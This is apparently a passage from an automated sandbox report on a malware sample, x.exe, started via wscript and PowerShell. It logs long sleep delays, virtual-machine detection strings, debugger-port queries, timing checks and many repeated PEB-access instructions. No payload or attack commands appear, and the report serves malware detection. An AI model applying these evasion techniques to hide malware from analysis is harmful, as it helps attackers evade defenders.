Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598331s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3808	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3704	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3444	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598331	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000002.1810546269.000001E28D81A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1810546269.000001E28D81A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@j
Source: powershell.exe, 00000001.00000002.1804047909.000001833A9B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: wscript.exe, 00000000.00000003.1808239303.000001E28B7DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1810254418.000001E28B7E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808184117.000001E28B7CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWes
Source: wscript.exe, 00000000.00000003.1808239303.000001E28B7DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1810254418.000001E28B7E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1808184117.000001E28B7CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: x.exe, 00000003.00000002.1840260458.0000000001122000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_019FD1C0 rdtsc

4_2_019FD1C0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_00417193 LdrLoadDll,

4_2_00417193

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]	4_2_0197A197
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]	4_2_0197A197
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]	4_2_0197A197
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]	4_2_01A311A4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]	4_2_01A311A4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]	4_2_01A311A4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A311A4 mov eax, dword ptr fs:[00000030h]	4_2_01A311A4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019D7190 mov eax, dword ptr fs:[00000030h]	4_2_019D7190
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C0185 mov eax, dword ptr fs:[00000030h]	4_2_019C0185
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199B1B0 mov eax, dword ptr fs:[00000030h]	4_2_0199B1B0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3C188 mov eax, dword ptr fs:[00000030h]	4_2_01A3C188
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A3C188 mov eax, dword ptr fs:[00000030h]	4_2_01A3C188
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]	4_2_01A0019F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]	4_2_01A0019F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]	4_2_01A0019F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]	4_2_01A0019F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A561E5 mov eax, dword ptr fs:[00000030h]	4_2_01A561E5
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BD1D0 mov eax, dword ptr fs:[00000030h]	4_2_019BD1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019BD1D0 mov ecx, dword ptr fs:[00000030h]	4_2_019BD1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_019FE1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_019FE1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FE1D0 mov ecx, dword ptr fs:[00000030h]	4_2_019FE1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_019FE1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]	4_2_019FE1D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A271F9 mov esi, dword ptr fs:[00000030h]	4_2_01A271F9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B01F8 mov eax, dword ptr fs:[00000030h]	4_2_019B01F8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A461C3 mov eax, dword ptr fs:[00000030h]	4_2_01A461C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A461C3 mov eax, dword ptr fs:[00000030h]	4_2_01A461C3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A551CB mov eax, dword ptr fs:[00000030h]	4_2_01A551CB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A51EF mov eax, dword ptr fs:[00000030h]	4_2_019A51EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019851ED mov eax, dword ptr fs:[00000030h]	4_2_019851ED
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]	4_2_0197B136
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]	4_2_0197B136
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]	4_2_0197B136
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197B136 mov eax, dword ptr fs:[00000030h]	4_2_0197B136
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01981131 mov eax, dword ptr fs:[00000030h]	4_2_01981131
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01981131 mov eax, dword ptr fs:[00000030h]	4_2_01981131
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A40115 mov eax, dword ptr fs:[00000030h]	4_2_01A40115
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2A118 mov ecx, dword ptr fs:[00000030h]	4_2_01A2A118
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]	4_2_01A2A118
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]	4_2_01A2A118
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]	4_2_01A2A118
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B0124 mov eax, dword ptr fs:[00000030h]	4_2_019B0124
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197C156 mov eax, dword ptr fs:[00000030h]	4_2_0197C156
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01987152 mov eax, dword ptr fs:[00000030h]	4_2_01987152
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01986154 mov eax, dword ptr fs:[00000030h]	4_2_01986154
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01986154 mov eax, dword ptr fs:[00000030h]	4_2_01986154
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A19179 mov eax, dword ptr fs:[00000030h]	4_2_01A19179
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]	4_2_01979148
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]	4_2_01979148
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]	4_2_01979148
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01979148 mov eax, dword ptr fs:[00000030h]	4_2_01979148
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197F172 mov eax, dword ptr fs:[00000030h]	4_2_0197F172
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]	4_2_01A14144
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]	4_2_01A14144
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A14144 mov ecx, dword ptr fs:[00000030h]	4_2_01A14144
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]	4_2_01A14144
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]	4_2_01A14144
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A55152 mov eax, dword ptr fs:[00000030h]	4_2_01A55152
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A18158 mov eax, dword ptr fs:[00000030h]	4_2_01A18158
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019B909C mov eax, dword ptr fs:[00000030h]	4_2_019B909C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AD090 mov eax, dword ptr fs:[00000030h]	4_2_019AD090
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AD090 mov eax, dword ptr fs:[00000030h]	4_2_019AD090
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01985096 mov eax, dword ptr fs:[00000030h]	4_2_01985096
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0198208A mov eax, dword ptr fs:[00000030h]	4_2_0198208A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197D08D mov eax, dword ptr fs:[00000030h]	4_2_0197D08D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A460B8 mov eax, dword ptr fs:[00000030h]	4_2_01A460B8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A460B8 mov ecx, dword ptr fs:[00000030h]	4_2_01A460B8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A060E0 mov eax, dword ptr fs:[00000030h]	4_2_01A060E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A90DB mov eax, dword ptr fs:[00000030h]	4_2_019A90DB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov ecx, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019970C0 mov eax, dword ptr fs:[00000030h]	4_2_019970C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FD0C0 mov eax, dword ptr fs:[00000030h]	4_2_019FD0C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019FD0C0 mov eax, dword ptr fs:[00000030h]	4_2_019FD0C0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197C0F0 mov eax, dword ptr fs:[00000030h]	4_2_0197C0F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019C20F0 mov ecx, dword ptr fs:[00000030h]	4_2_019C20F0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019880E9 mov eax, dword ptr fs:[00000030h]	4_2_019880E9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197A0E3 mov ecx, dword ptr fs:[00000030h]	4_2_0197A0E3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A550D9 mov eax, dword ptr fs:[00000030h]	4_2_01A550D9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A020DE mov eax, dword ptr fs:[00000030h]	4_2_01A020DE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A50E4 mov eax, dword ptr fs:[00000030h]	4_2_019A50E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019A50E4 mov ecx, dword ptr fs:[00000030h]	4_2_019A50E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]	4_2_0199E016
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]	4_2_0199E016
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]	4_2_0199E016
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]	4_2_0199E016
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]	4_2_01A4903E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]	4_2_01A4903E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]	4_2_01A4903E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A4903E mov eax, dword ptr fs:[00000030h]	4_2_01A4903E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A04000 mov ecx, dword ptr fs:[00000030h]	4_2_01A04000
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197A020 mov eax, dword ptr fs:[00000030h]	4_2_0197A020
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_0197C020 mov eax, dword ptr fs:[00000030h]	4_2_0197C020
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A55060 mov eax, dword ptr fs:[00000030h]	4_2_01A55060
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01982050 mov eax, dword ptr fs:[00000030h]	4_2_01982050
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_019AB052 mov eax, dword ptr fs:[00000030h]	4_2_019AB052
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01A0106E mov eax, dword ptr fs:[00000030h]	4_2_01A0106E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov ecx, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01991070 mov eax, dword ptr fs:[00000030h]	4_2_01991070
